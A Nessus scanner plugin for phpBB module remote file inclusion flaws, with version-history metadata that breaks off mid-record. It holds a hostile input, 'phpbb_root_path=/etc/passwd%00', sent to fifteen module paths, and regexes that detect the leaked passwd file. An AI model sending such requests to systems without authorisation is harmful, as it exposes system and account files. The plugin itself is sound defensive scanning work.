ID PHPBB_AUCTION_PHPBB_ROOT_PATH_FILE_INCLUDE.NASL Type nessus Reporter Tenable Modified 2018-11-15T00:00:00
Description
The remote host contains a third-party module for phpBB.
The version of at least one such component or module installed on the
remote host fails to sanitize input to the 'phpbb_root_path' parameter
before using it to include PHP code. Provided PHP's
'register_globals' setting is enabled, an unauthenticated attacker may
be able to exploit these flaws to view arbitrary files on the remote
host or to execute arbitrary PHP code, possibly taken from third-party
hosts.
#
# (C) Tenable Network Security, Inc.
#
# Do nothing on engines whose NASL_LEVEL is below 3000.
if (NASL_LEVEL < 3000)
{
  exit(0);
}
include("compat.inc");
# Registration pass: when 'description' is set, the block below only declares
# the plugin's metadata and then exits (see the exit(0) at its end), so none
# of the probing code further down runs in this pass.
if (description)
{
script_id(21323);
script_version("1.40");
# One plugin covers the same 'phpbb_root_path' flaw in several third-party
# modules, hence the multiple CVE, Bugtraq and EDB identifiers.
script_cve_id(
"CVE-2006-2245",
"CVE-2006-5301",
"CVE-2006-5306",
"CVE-2006-5390",
"CVE-2006-5418",
"CVE-2006-7090",
"CVE-2006-7100",
"CVE-2006-7147",
"CVE-2007-5009",
"CVE-2007-5100"
);
script_bugtraq_id(
17822,
20484,
20485,
20493,
20501,
20518,
20525,
20558,
20571,
21171,
25737,
25776
);
script_xref(name:"EDB-ID", value:"2483");
script_xref(name:"EDB-ID", value:"2522");
script_xref(name:"EDB-ID", value:"2525");
script_xref(name:"EDB-ID", value:"2533");
script_xref(name:"EDB-ID", value:"2538");
# The title names remote file inclusion, while the summary states what the
# check actually attempts: reading a local file through the modules.
script_name(english:"phpBB Multiple Module phpbb_root_path Parameter Remote File Inclusion");
script_summary(english:"Tries to read a local file using phpBB modules");
script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that is prone to
remote file include attacks." );
script_set_attribute(attribute:"description", value:
"The remote host contains a third-party module for phpBB.
The version of at least one such component or module installed on the
remote host fails to sanitize input to the 'phpbb_root_path' parameter
before using it to include PHP code. Provided PHP's
'register_globals' setting is enabled, an unauthenticated attacker may
be able to exploit these flaws to view arbitrary files on the remote
host or to execute arbitrary PHP code, possibly taken from third-party
hosts." );
# Each archive URL in a comment is followed by a shortened nessus.org link;
# presumably the short link points at that archived page.
# http://web.archive.org/web/20070527141033/http://pridels.blogspot.com/2006/05/phpbb-auction-mod-remote-file.html
script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?9640ab6a" );
script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2006/Oct/209" );
script_set_attribute(attribute:"see_also", value:"https://www.phpbb.com/community/viewtopic.php?p=2504370&highlight=#2504370" );
script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/452012/30/0/threaded" );
script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/479997/30/0/threaded" );
# https://web.archive.org/web/20160820141912/http://www.phpbb2.de/ftopic45218.html
script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?37fd2995" );
# The remediation offered is a configuration change (register_globals off)
# or a vendor upgrade; no fixed module version is named.
script_set_attribute(attribute:"solution", value:
"Disable PHP's 'register_globals' setting or contact the product's
author to see if an upgrade exists." );
# CVSS v2 base vector: network access, medium complexity, no authentication,
# partial confidentiality / integrity / availability impact.
script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P");
# CVSS v2 temporal vector: functional exploit, official fix, confirmed report.
script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
# NOTE(review): 'exploit_available' is "false" while the temporal vector says
# E:F and the CANVAS flag is "true" -- these look inconsistent; confirm which
# value downstream prioritisation should rely on.
script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
script_set_attribute(attribute:"exploit_available", value:"false");
script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
script_set_attribute(attribute:"canvas_package", value:'CANVAS');
# CWE-94: code injection.
script_cwe_id(94);
script_set_attribute(attribute:"plugin_publication_date", value: "2006/05/04");
script_set_attribute(attribute:"vuln_publication_date", value: "2006/05/03");
script_cvs_date("Date: 2018/11/15 20:50:18");
script_set_attribute(attribute:"plugin_type", value:"remote");
# NOTE(review): the CPE names only the phpBB auction module although the
# check covers many modules; asset matching keyed on this CPE may not
# reflect the others -- confirm.
script_set_attribute(attribute:"cpe",value:"cpe:/a:phpbb_group:phpbb-auction");
script_end_attributes();
# ACT_ATTACK: the check sends a request that attempts the inclusion instead
# of inferring the flaw from a version string.
script_category(ACT_ATTACK);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2006-2018 and is owned by Tenable, Inc. or an Affiliate thereof.");
# Scheduling constraints: depends on phpbb_detect.nasl, requires the
# 'www/phpBB' KB key, and is excluded when 'Settings/disable_cgi_scanning'
# is set.
script_dependencies("phpbb_detect.nasl");
script_exclude_keys("Settings/disable_cgi_scanning");
script_require_ports("Services/www", 80);
script_require_keys("www/phpBB");
exit(0);
}
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("data_protection.inc");
# Select the web server port to test (default 80) and stop when
# can_host_php() says the server on that port cannot run PHP.
port = get_http_port(default:80);
if (!can_host_php(port:port))
{
  exit(0);
}
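# Script paths, relative to the phpBB install directory, that are requested
# with a crafted 'phpbb_root_path' parameter.  Each entry is labelled with
# the third-party module(s) that ship the file.  'nmods' ends up holding the
# number of entries and is the loop bound used by the probe.
nmods = 0;
mod = make_array();
# - ACP User Registration, Import Tools - Members, Insert User
#   (all three ship this same file; it is listed once because repeating it
#   only resends an identical request and, when thorough tests are on,
#   repeats the same line in the report)
mod[nmods++] = "/includes/functions_mod_user.php";
# - Admin User Viewed Posts Tracker
mod[nmods++] = "/includes/functions_user_viewed_posts.php";
# - AI chat (included in PlusXL)
mod[nmods++] = "/mods/iai/includes/constants.php";
# - Journals System
mod[nmods++] = "/includes/journals_delete.php";
mod[nmods++] = "/includes/journals_edit.php";
mod[nmods++] = "/includes/journals_post.php";
# - phpBB auction
mod[nmods++] = "/auction/auction_common.php";
# - phpBB Search Engine Indexer
mod[nmods++] = "/includes/archive/archive_topic.php";
# - phpBB Security
mod[nmods++] = "/includes/phpbb_security.php";
# - phpBB2 Plus (not really a mod)
mod[nmods++] = "/language/lang_german/lang_main_album.php";
mod[nmods++] = "/language/lang_german/lang_admin_album.php";
mod[nmods++] = "/language/lang_english/lang_main_album.php";
mod[nmods++] = "/language/lang_english/lang_admin_album.php";
# - PlusXL itself
mod[nmods++] = "/includes/functions.php";
# - SpamBlockerMod
mod[nmods++] = "/includes/antispam.php";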
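# Accumulators for the report: 'info' collects the affected script paths and
# 'contents' keeps the first captured copy of the file, if one is returned.
info = "";
contents = "";

# The install location is read from the 'www/<port>/phpBB' KB entry; without
# that entry there is nothing to test.
install = get_kb_item(string("www/", port, "/phpBB"));
if (isnull(install)) exit(0);

# The KB value is expected to look like "<text> under <path>"; only the path
# (second capture group) is used.
matches = eregmatch(string:install, pattern:"^(.+) under (/.*)$");
if (!isnull(matches))
{
  dir = matches[2];

  # Value sent as 'phpbb_root_path'.  The trailing %00 is a URL-encoded NUL
  # byte; presumably it is there to cut off whatever the module appends to
  # the path before including it.
  # NOTE(review): PHP builds that reject NUL bytes in file paths will not
  # behave this way, so a clean result there does not by itself show that a
  # module is fixed -- confirm coverage for such hosts.
  file = "/etc/passwd%00";

  for (i=0; i<nmods; i++)
  {
    r = http_send_recv3(
      method:"GET",
      item:string(dir, mod[i], "?", "phpbb_root_path=", file),
      port:port
    );
    # No response: stop probing, but leave the loop with 'break' rather than
    # exit(0) so that hits already recorded in 'info' (possible when thorough
    # tests are enabled) are still reported instead of being discarded.
    if (isnull(r)) break;
    res = r[2];

    # Direct evidence: the response contains a passwd-style entry for root.
    got_passwd = egrep(pattern:"root:.*:0:[01]:", string:res);

    # Indirect evidence: a PHP error that names the supplied path, which
    # shows the parameter reached a file-open call even though the file
    # itself was not returned.
    if (
      got_passwd ||
      # "failed to open stream" with the NUL shown as a literal \0 in the path
      egrep(pattern:"main\(/etc/passwd\\0.+ failed to open stream", string:res) ||
      # "failed to open stream: No such file or directory" for the bare path
      egrep(pattern:"main\(/etc/passwd\).*: failed to open stream: No such file or directory", string:res) ||
      # the open was refused by an open_basedir restriction
      egrep(pattern:"main.+ open_basedir restriction in effect. File\(/etc/passwd", string:res)
    )
    {
      info = info +
        " " + dir + mod[i] + '\n';

      # Keep only the first capture, trimmed at the first "<br" so that
      # trailing HTML is left out.
      if (!contents && got_passwd)
        contents = res - strstr(res, "<br");

      # One hit is enough unless thorough tests were requested.
      if (!thorough_tests) break;
    }
  }
}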
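# Emit a finding only when at least one script path matched.
if (info)
{
  if (contents)
  {
    # The captured text goes through data_protection::redact_etc_passwd()
    # before it is embedded, presumably so that account details are masked
    # in stored scan results -- confirm against data_protection.inc.
    contents = data_protection::redact_etc_passwd(output:contents);
    info = string(
      info,
      "\n",
      "And here are the contents of the file '/etc/passwd' that Nessus\n",
      "was able to read from the remote host :\n",
      "\n",
      contents
    );
  }

  # Heading wording corrected from "scripts(s)" to "script(s)".
  report = string(
    "The following script(s) are vulnerable :\n",
    "\n",
    info
  );
  security_warning(port:port, extra:report);
}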
{"id": "PHPBB_AUCTION_PHPBB_ROOT_PATH_FILE_INCLUDE.NASL", "bulletinFamily": "scanner", "title": "phpBB Multiple Module phpbb_root_path Parameter Remote File Inclusion", "description": "The remote host contains a third-party module for phpBB. \n\nThe version of at least one such component or module installed on the\nremote host fails to sanitize input to the 'phpbb_root_path' parameter\nbefore using it to include PHP code. Provided PHP's\n'register_globals' setting is enabled, an unauthenticated attacker may\nbe able to exploit these flaws to view arbitrary files on the remote\nhost or to execute arbitrary PHP code, possibly taken from third-party\nhosts.", "published": "2006-05-04T00:00:00", "modified": "2018-11-15T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=21323", "reporter": "Tenable", "references": ["https://www.phpbb.com/community/viewtopic.php?p=2504370&highlight=#2504370", "https://seclists.org/bugtraq/2006/Oct/209", "http://www.nessus.org/u?9640ab6a", "https://www.securityfocus.com/archive/1/452012/30/0/threaded", "https://www.securityfocus.com/archive/1/479997/30/0/threaded", "http://www.nessus.org/u?37fd2995"], "cvelist": ["CVE-2006-7090", "CVE-2006-5301", "CVE-2006-5418", "CVE-2006-7100", "CVE-2007-5009", "CVE-2006-5390", "CVE-2006-7147", "CVE-2006-2245", "CVE-2007-5100", "CVE-2006-5306"], "type": "nessus", "lastseen": "2019-01-16T20:06:36", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:phpbb_group:phpbb-auction"], "cvelist": ["CVE-2006-7090", "CVE-2006-5301", "CVE-2006-5418", "CVE-2006-7100", "CVE-2007-5009", "CVE-2006-5390", "CVE-2006-7147", "CVE-2006-2245", "CVE-2007-5100", "CVE-2006-5306"], "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "The remote host contains a third-party module for phpBB. 
\n\nThe version of at least one such component or module installed on the remote host fails to sanitize input to the 'phpbb_root_path' parameter before using it to include PHP code. Provided PHP's 'register_globals' setting is enabled, an unauthenticated attacker may be able to exploit these flaws to view arbitrary files on the remote host or to execute arbitrary PHP code, possibly taken from third-party hosts.", "edition": 8, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "edd7ee8e3a8af0edb691dfe69de82b00662dc8b2240e7e72ad1340eff430eec5", "hashmap": [{"hash": "cd1acb6332b705efcfb274e39bdce0d5", "key": "title"}, {"hash": "4e9ff411278dd1e0a2396e82da16469b", "key": "modified"}, {"hash": "fed7aede4a5f01a9fc080184a2dd8da8", "key": "references"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "eb7c1eabb2baa803f2635d2ba4792d3f", "key": "pluginID"}, {"hash": "69db04a1c80dd4a176e4f3d53561e805", "key": "cvelist"}, {"hash": "b8ec7988b9627a83f1d82122e582413e", "key": "description"}, {"hash": "c4b485d682c254d7a96e0721a51e4986", "key": "sourceData"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "8b5dc20b319b47100bd63d45b155e50c", "key": "published"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "737e2591b537c46d1ca7ce6f0cea5cb9", "key": "cvss"}, {"hash": "65920404be9df979f281f296ff035289", "key": "cpe"}, {"hash": "9acce4448de96d820472fbc896512e35", "key": "href"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=21323", "id": "PHPBB_AUCTION_PHPBB_ROOT_PATH_FILE_INCLUDE.NASL", "lastseen": "2018-09-01T23:56:41", "modified": "2018-07-24T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.3", "pluginID": "21323", "published": "2006-05-04T00:00:00", "references": ["http://www.securityfocus.com/archive/1/479997/30/0/threaded", "http://www.nessus.org/u?9640ab6a", 
"http://www.phpbb.com/phpBB/viewtopic.php?p=2504370&highlight=#2504370", "http://www.nessus.org/u?37fd2995", "http://seclists.org/bugtraq/2006/Oct/209", "http://www.securityfocus.com/archive/1/452012/30/0/threaded"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(21323);\n script_version(\"1.39\");\n\n script_cve_id(\n \"CVE-2006-2245\",\n \"CVE-2006-5301\",\n \"CVE-2006-5306\",\n \"CVE-2006-5390\",\n \"CVE-2006-5418\",\n \"CVE-2006-7090\",\n \"CVE-2006-7100\",\n \"CVE-2006-7147\",\n \"CVE-2007-5009\",\n \"CVE-2007-5100\"\n );\n script_bugtraq_id(\n 17822, \n 20484, \n 20485, \n 20493, \n 20501, \n 20518, \n 20525, \n 20558, \n 20571, \n 21171, \n 25737, \n 25776\n );\n script_xref(name:\"EDB-ID\", value:\"2483\");\n script_xref(name:\"EDB-ID\", value:\"2522\");\n script_xref(name:\"EDB-ID\", value:\"2525\");\n script_xref(name:\"EDB-ID\", value:\"2533\");\n script_xref(name:\"EDB-ID\", value:\"2538\");\n\n script_name(english:\"phpBB Multiple Module phpbb_root_path Parameter Remote File Inclusion\");\n script_summary(english:\"Tries to read a local file using phpBB modules\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is prone to\nremote file include attacks.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host contains a third-party module for phpBB. \n\nThe version of at least one such component or module installed on the\nremote host fails to sanitize input to the 'phpbb_root_path' parameter\nbefore using it to include PHP code. 
Provided PHP's\n'register_globals' setting is enabled, an unauthenticated attacker may\nbe able to exploit these flaws to view arbitrary files on the remote\nhost or to execute arbitrary PHP code, possibly taken from third-party\nhosts.\" );\n # http://web.archive.org/web/20070527141033/http://pridels.blogspot.com/2006/05/phpbb-auction-mod-remote-file.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9640ab6a\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/bugtraq/2006/Oct/209\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.phpbb.com/phpBB/viewtopic.php?p=2504370&highlight=#2504370\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/452012/30/0/threaded\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/479997/30/0/threaded\" );\n # https://web.archive.org/web/20160820141912/http://www.phpbb2.de/ftopic45218.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?37fd2995\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Disable PHP's 'register_globals' setting or contact the product's\nauthor to see if an upgrade exists.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94);\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2006/05/04\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2006/05/03\");\n script_cvs_date(\"Date: 2018/07/24 18:56:11\");\n 
script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:phpbb_group:phpbb-auction\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2006-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"phpbb_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/phpBB\");\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"data_protection.inc\");\n\nport = get_http_port(default:80);\nif (!can_host_php(port:port)) exit(0);\n\n\n# Vulnerable scripts.\n# - modules\nnmods = 0;\nmod = make_array();\n# - ACP User Registration\nmod[nmods++] = \"/includes/functions_mod_user.php\";\n# - Admin User Viewed Posts Tracker\nmod[nmods++] = \"/includes/functions_user_viewed_posts.php\";\n# - AI chat (included in PlusXL)\nmod[nmods++] = \"/mods/iai/includes/constants.php\";\n# - Import Tools - Members\nmod[nmods++] = \"/includes/functions_mod_user.php\";\n# - Insert User\nmod[nmods++] = \"/includes/functions_mod_user.php\";\n# - Journals System\nmod[nmods++] = \"/includes/journals_delete.php\";\nmod[nmods++] = \"/includes/journals_edit.php\";\nmod[nmods++] = \"/includes/journals_post.php\";\n# - phpBB auction\nmod[nmods++] = \"/auction/auction_common.php\";\n# - phpBB Search Engine Indexer\nmod[nmods++] = \"/includes/archive/archive_topic.php\";\n# - phpBB Security\nmod[nmods++] = \"/includes/phpbb_security.php\";\n# - phpBB2 Plus (not really a mod)\nmod[nmods++] = \"/language/lang_german/lang_main_album.php\";\nmod[nmods++] = \"/language/lang_german/lang_admin_album.php\";\nmod[nmods++] = \"/language/lang_english/lang_main_album.php\";\nmod[nmods++] = \"/language/lang_english/lang_admin_album.php\";\n# - PlusXL 
itself\nmod[nmods++] = \"/includes/functions.php\";\n# - SpamBlockerMod\nmod[nmods++] = \"/includes/antispam.php\";\n\n\ninfo = \"\";\ncontents = \"\";\n\n\n# Test an install.\ninstall = get_kb_item(string(\"www/\", port, \"/phpBB\"));\nif (isnull(install)) exit(0);\nmatches = eregmatch(string:install, pattern:\"^(.+) under (/.*)$\");\nif (!isnull(matches)) {\n dir = matches[2];\n\n # Try to exploit the flaw to read a file.\n file = \"/etc/passwd%00\";\n for (i=0; i<nmods; i++)\n {\n r = http_send_recv3(method:\"GET\", \n item:string(\n dir, mod[i], \"?\",\n \"phpbb_root_path=\", file\n ), \n port:port\n );\n if (isnull(r)) exit(0);\n res = r[2];\n\n # There's a problem if...\n if (\n # there's an entry for root or...\n egrep(pattern:\"root:.*:0:[01]:\", string:res) ||\n # we get an error saying \"failed to open stream\".\n egrep(pattern:\"main\\(/etc/passwd\\\\0.+ failed to open stream\", string:res) ||\n # we get an error claiming the file doesn't exist or...\n egrep(pattern:\"main\\(/etc/passwd\\).*: failed to open stream: No such file or directory\", string:res) ||\n # we get an error about open_basedir restriction.\n egrep(pattern:\"main.+ open_basedir restriction in effect. 
File\\(/etc/passwd\", string:res)\n )\n {\n info = info +\n \" \" + dir + mod[i] + '\\n';\n\n if (!contents && egrep(string:res, pattern:\"root:.*:0:[01]:\"))\n contents = res - strstr(res, \"<br\");\n\n if (!thorough_tests) break;\n }\n }\n}\n\nif (info)\n{\n if (contents)\n {\n contents = data_protection::redact_etc_passwd(output:contents);\n info = string(\n info,\n \"\\n\",\n \"And here are the contents of the file '/etc/passwd' that Nessus\\n\",\n \"was able to read from the remote host :\\n\",\n \"\\n\",\n contents\n );\n }\n report = string(\n \"The following scripts(s) are vulnerable :\\n\",\n \"\\n\",\n info\n );\n\n security_warning(port:port, extra:report);\n}\n", "title": "phpBB Multiple Module phpbb_root_path Parameter Remote File Inclusion", "type": "nessus", "viewCount": 0}, "differentElements": ["references", "modified", "sourceData"], "edition": 8, "lastseen": "2018-09-01T23:56:41"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2006-7090", "CVE-2006-5301", "CVE-2006-5418", "CVE-2006-7100", "CVE-2007-5009", "CVE-2006-5390", "CVE-2006-7147", "CVE-2006-2245", "CVE-2007-5100", "CVE-2006-5306"], "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "The remote host contains a third-party module for phpBB. \n\nThe version of at least one such component or module installed on the remote host fails to sanitize input to the 'phpbb_root_path' parameter before using it to include PHP code. 
Provided PHP's 'register_globals' setting is enabled, an unauthenticated attacker may be able to exploit these flaws to view arbitrary files on the remote host or to execute arbitrary PHP code, possibly taken from third-party hosts.", "edition": 1, "hash": "01199a7dc0f94416277348ea92dbb0131df47bb5c276687aee395dbcae9c8450", "hashmap": [{"hash": "cd1acb6332b705efcfb274e39bdce0d5", "key": "title"}, {"hash": "30f8a3cd16450f4fae9f6381156dd10d", "key": "modified"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "6c23fe739a0794bded389ced7f4df2f1", "key": "references"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "eb7c1eabb2baa803f2635d2ba4792d3f", "key": "pluginID"}, {"hash": "3608c1d3b0f5b19a656f521c1870c4aa", "key": "sourceData"}, {"hash": "69db04a1c80dd4a176e4f3d53561e805", "key": "cvelist"}, {"hash": "b8ec7988b9627a83f1d82122e582413e", "key": "description"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "8b5dc20b319b47100bd63d45b155e50c", "key": "published"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "737e2591b537c46d1ca7ce6f0cea5cb9", "key": "cvss"}, {"hash": "9acce4448de96d820472fbc896512e35", "key": "href"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=21323", "id": "PHPBB_AUCTION_PHPBB_ROOT_PATH_FILE_INCLUDE.NASL", "lastseen": "2016-09-26T17:25:32", "modified": "2016-05-20T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.2", "pluginID": "21323", "published": "2006-05-04T00:00:00", "references": ["http://www.securityfocus.com/archive/1/479997/30/0/threaded", "http://www.nessus.org/u?9640ab6a", "http://archives.neohapsis.com/archives/bugtraq/2006-10/0210.html", "http://www.phpbb.com/phpBB/viewtopic.php?p=2504370&highlight=#2504370", "http://www.phpbb2.de/ftopic45218.html", 
"http://www.securityfocus.com/archive/1/452012/30/0/threaded"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(21323);\n script_version(\"$Revision: 1.35 $\");\n\n script_cve_id(\n \"CVE-2006-2245\",\n \"CVE-2006-5301\",\n \"CVE-2006-5306\",\n \"CVE-2006-5390\",\n \"CVE-2006-5418\",\n \"CVE-2006-7090\",\n \"CVE-2006-7100\",\n \"CVE-2006-7147\",\n \"CVE-2007-5009\",\n \"CVE-2007-5100\"\n );\n script_bugtraq_id(\n 17822, \n 20484, \n 20485, \n 20493, \n 20501, \n 20518, \n 20525, \n 20558, \n 20571, \n 21171, \n 25737, \n 25776\n );\n script_osvdb_id(\n 25263,\n 29711,\n 29712,\n 29713,\n 29714,\n 29734,\n 29751,\n 31029,\n 35449,\n 35450,\n 38265,\n 38723,\n 38724,\n 38725\n );\n script_xref(name:\"EDB-ID\", value:\"2483\");\n script_xref(name:\"EDB-ID\", value:\"2522\");\n script_xref(name:\"EDB-ID\", value:\"2525\");\n script_xref(name:\"EDB-ID\", value:\"2533\");\n script_xref(name:\"EDB-ID\", value:\"2538\");\n\n script_name(english:\"phpBB Multiple Module phpbb_root_path Parameter Remote File Inclusion\");\n script_summary(english:\"Tries to read a local file using phpBB modules\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is prone to\nremote file include attacks.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host contains a third-party module for phpBB. \n\nThe version of at least one such component or module installed on the\nremote host fails to sanitize input to the 'phpbb_root_path' parameter\nbefore using it to include PHP code. 
Provided PHP's\n'register_globals' setting is enabled, an unauthenticated attacker may\nbe able to exploit these flaws to view arbitrary files on the remote\nhost or to execute arbitrary PHP code, possibly taken from third-party\nhosts.\" );\n # http://web.archive.org/web/20070527141033/http://pridels.blogspot.com/2006/05/phpbb-auction-mod-remote-file.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9640ab6a\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://archives.neohapsis.com/archives/bugtraq/2006-10/0210.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.phpbb.com/phpBB/viewtopic.php?p=2504370&highlight=#2504370\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/452012/30/0/threaded\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/479997/30/0/threaded\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.phpbb2.de/ftopic45218.html\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Disable PHP's 'register_globals' setting or contact the product's\nauthor to see if an upgrade exists.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94);\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2006/05/04\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2006/05/03\");\n script_cvs_date(\"$Date: 2016/05/20 14:30:35 $\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n 
script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:phpbb_group:phpbb-auction\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2006-2016 Tenable Network Security, Inc.\");\n\n script_dependencies(\"phpbb_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/phpBB\");\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:80);\nif (!can_host_php(port:port)) exit(0);\n\n\n# Vulnerable scripts.\n# - modules\nnmods = 0;\nmod = make_array();\n# - ACP User Registration\nmod[nmods++] = \"/includes/functions_mod_user.php\";\n# - Admin User Viewed Posts Tracker\nmod[nmods++] = \"/includes/functions_user_viewed_posts.php\";\n# - AI chat (included in PlusXL)\nmod[nmods++] = \"/mods/iai/includes/constants.php\";\n# - Import Tools - Members\nmod[nmods++] = \"/includes/functions_mod_user.php\";\n# - Insert User\nmod[nmods++] = \"/includes/functions_mod_user.php\";\n# - Journals System\nmod[nmods++] = \"/includes/journals_delete.php\";\nmod[nmods++] = \"/includes/journals_edit.php\";\nmod[nmods++] = \"/includes/journals_post.php\";\n# - phpBB auction\nmod[nmods++] = \"/auction/auction_common.php\";\n# - phpBB Search Engine Indexer\nmod[nmods++] = \"/includes/archive/archive_topic.php\";\n# - phpBB Security\nmod[nmods++] = \"/includes/phpbb_security.php\";\n# - phpBB2 Plus (not really a mod)\nmod[nmods++] = \"/language/lang_german/lang_main_album.php\";\nmod[nmods++] = \"/language/lang_german/lang_admin_album.php\";\nmod[nmods++] = \"/language/lang_english/lang_main_album.php\";\nmod[nmods++] = \"/language/lang_english/lang_admin_album.php\";\n# - PlusXL itself\nmod[nmods++] = \"/includes/functions.php\";\n# - SpamBlockerMod\nmod[nmods++] = \"/includes/antispam.php\";\n\n\ninfo = 
